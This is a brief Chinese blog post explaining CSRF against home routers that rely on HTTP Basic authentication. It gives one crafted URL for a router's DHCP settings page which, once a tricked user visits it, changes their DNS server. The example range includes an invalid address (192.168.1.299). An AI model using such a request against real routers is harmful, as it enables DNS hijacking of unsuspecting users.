AD

Http Authentication CSRF的危害

国内很多路由器使用Http Authentication认证方式认证,该认证方式对提交的用户名和口令进行base64加密,除此之外无其他安全措施,导致在获取到用户名口令后,可以构造URL参数,直接修改路由器配置,例如:

http://192.168.1.1/userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1=192.168.1.110&ip2=192.168.1.299&Lease=120&gateway=0.0.0.0&domain=&dnsserver=8.8.8.8&dnsserver2=0.0.0.0&Save=%B1%A3+%B4%E6

诱骗用户访问后可以使用户DNS被修改为8.8.8.8

评论

此博客中的热门博文

简单粗暴导出小米便签

我——终于一个人了

Ubiquiti_Networks_UniFi_Cloud_Key_authed_rce